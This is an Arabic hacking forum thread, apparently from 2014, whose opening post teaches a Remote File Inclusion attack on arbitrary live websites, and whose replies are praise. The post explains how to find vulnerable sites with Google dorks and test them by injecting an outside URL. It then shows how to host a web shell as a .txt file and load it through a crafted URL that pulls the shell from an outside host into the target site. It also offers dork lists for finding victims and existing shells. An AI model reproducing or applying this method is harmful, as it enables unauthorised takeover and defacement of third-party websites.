شرح ثغره rfi

الموضوع في '[ الـثـغـرات ]' بواسطة NETJOURNAL, بتاريخ ‏12 أكتوبر 2014.

الوسوم:
حالة الموضوع:
مغلق
  1. NETJOURNAL

    NETJOURNAL مشرف

    الأنتساب:
    ‏18 مايو 2006
    المشاركات:
    676
    الإعجابات المتلقاة:
    1,543
    نقاط الجائزة:
    93
    الجنس:
    ذكر
    الوظيفة:
    ExploitCoding - ShellCoding - Defacer
    الإقامة:
    etc/shadow/~root
    السلام عليكم و رحمه الله و بركاته
    كيف حالكم شباب انشاء الله بخير جميعا .
    حبيت اقدملكم شرح مبسط عن ثغره Remote File Inclusion ~RFI
    ++++++++++++++++++++++++++++++++++++++++++++++
    رح نتعلم الأتي :-
    # البحث عن مواقع مصابه.
    # التأكد من اصابه الموقع.
    # استغلال الثغره ( استعراض الشل ).
    +++++++++++++++++++
    [#] البحث عن مواقع مصابه ..!
    يتم البحث عبر الدوركات Google Dorks.
    سيتم ارفاق تجميعه دوركات للبحث .

    +++++++++++++++++
    [#] التأكد من اصابه الموقع ..
    بعد وضع الدورك المخصص في غوغل..نختار اي موقع ..
    بعد الدخول للموقع نلاحظ ان رابط الموقع ينتهي بـــ
    action.php?page=any thing

    بسهوله نقوم بحذف ما بعد علامه المساواه (=)
    و نضع بدله اي موقع يجي ع بالنا بهذا الشكل http://www.site.com ..مثلا
    index.php?page=http://iq-team.org
    ونلاحظ لو بقى الموقع على حاله او ظهر خطأ يعني الموقع مو مصاب ندور غيره .
    و لو أظهر لنا و حولنا ع موقع عراق تيم يبقى الموقع مصاب و الأمور تمام..

    ++++++++++++++++++++++++++++++++++++++++++++++
    [#] استغلال الثغره ّ
    كل الي نقدر نعمله حاجتين ؟
    اول نروح ع استضافه مجانيه و نشترك و نعمل دومين من نفس الموقع و رح يعطوك لوحه CPanel تدخل و ترفع شل بصيغه
    txt
    ===============
    ثانيا استخدام دوركات للبحث عن شلات مرفوعه بصيغه txt
    ===============
    الأن كل الي علينا نجيب رابط الموقع الي رفعنا عليه شل بصيغه تيكست و نعمل هكذا.

    www.target.com/index.php?page=http://www.site.com/shell.txt؟

    لازم نظيف علامه الأستــفهام (؟) بعد ?txt
    ?shell.txt
    تم استعراض الشل بنجاح .

    ++++++++++++++++++++++++
    :ُeُeِq:دمتم بود . موفقين.:ُeُeِq:
    ++++++++++++++++++++++++
    لتحميل دوركات البحث!

    RFI DORKS&shell.txt dorks




     
  2. Ameer Eagle

    Ameer Eagle V • I • P

    الأنتساب:
    ‏7 يونيو 2014
    المشاركات:
    3,233
    الإعجابات المتلقاة:
    2,779
    نقاط الجائزة:
    113
    الجنس:
    ذكر
    الوظيفة:
    Student
    الإقامة:
    IraQ
    رد: شرح ثغره rfi

    وعليكم السلام ورحة الله
    بارك الله بيك
    شرح كافي ووافي
     
  3. KaDiM aL-iRaQi

    KaDiM aL-iRaQi ExpertDeveloper ExpErt DeveloPer

    الأنتساب:
    ‏2 سبتمبر 2014
    المشاركات:
    680
    الإعجابات المتلقاة:
    23
    نقاط الجائزة:
    18
    رد: شرح ثغره rfi

    عشت خوي ربي يوفقك ً#ٌ5oًًًُ.
     
  4. 3mran

    3mran Developer

    الأنتساب:
    ‏2 ابريل 2012
    المشاركات:
    70
    الإعجابات المتلقاة:
    12
    نقاط الجائزة:
    8
    رد: شرح ثغره rfi

    يعطيـك العافية
    بـارك الله فيـك
    جاري التقييم ان أمكن
     
  5. mr.grey hat

    mr.grey hat Developer

    الأنتساب:
    ‏7 أكتوبر 2014
    المشاركات:
    29
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    3
    رد: شرح ثغره rfi

    بسم الله الرحمن الرحيم

    ماشاء الله عليك ي أخ iraq spy مبدع كعادتك وشرحك سهل ومبسط ومفهوم تقبل مروري أخي :)
     
  6. TeePlow

    TeePlow V • I • P

    الأنتساب:
    ‏12 مارس 2014
    المشاركات:
    400
    الإعجابات المتلقاة:
    9
    نقاط الجائزة:
    18
    رد: شرح ثغره rfi

    السلام عليكم
    بارك الله فيك حبيبي شرح رائع
     
  7. MJHOOL

    MJHOOL Developer

    الأنتساب:
    ‏6 يونيو 2012
    المشاركات:
    29
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    رد: شرح ثغره rfi

    الله يعطيك العافية يابطل
     
  8. Mstr Yaser

    Mstr Yaser <span style="font-weight: bold; text-shadow: #BBBB موقوف لمخالفة الشروط

    الأنتساب:
    ‏21 نوفمبر 2014
    المشاركات:
    353
    الإعجابات المتلقاة:
    6
    نقاط الجائزة:
    18
    المخالفات
    1
    رد: شرح ثغره rfi

    شرح رائع يعطيك العافية
     
  9. MR.CAPTCHA

    MR.CAPTCHA Expert Developer ExpErt DeveloPer

    الأنتساب:
    ‏30 أغسطس 2014
    المشاركات:
    1,786
    الإعجابات المتلقاة:
    14
    نقاط الجائزة:
    38
    الوظيفة:
    I.T Student
    الإقامة:
    IRAQ
    رد: شرح ثغره rfi

    بارك الله بيك شرح رائع
     
  10. Mokhalad HaXor

    Mokhalad HaXor آداريً شؤون الأعضًاء

    الأنتساب:
    ‏3 يوليو 2012
    المشاركات:
    3,319
    الإعجابات المتلقاة:
    2,463
    نقاط الجائزة:
    113
    الجنس:
    ذكر
    الوظيفة:
    Hacking
    الإقامة:
    etc/shadow
    رد: شرح ثغره rfi

    تسلم الايادي شرح جميل جدآ , واكثر من واضح :{11}: :{11}: :{11}:
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة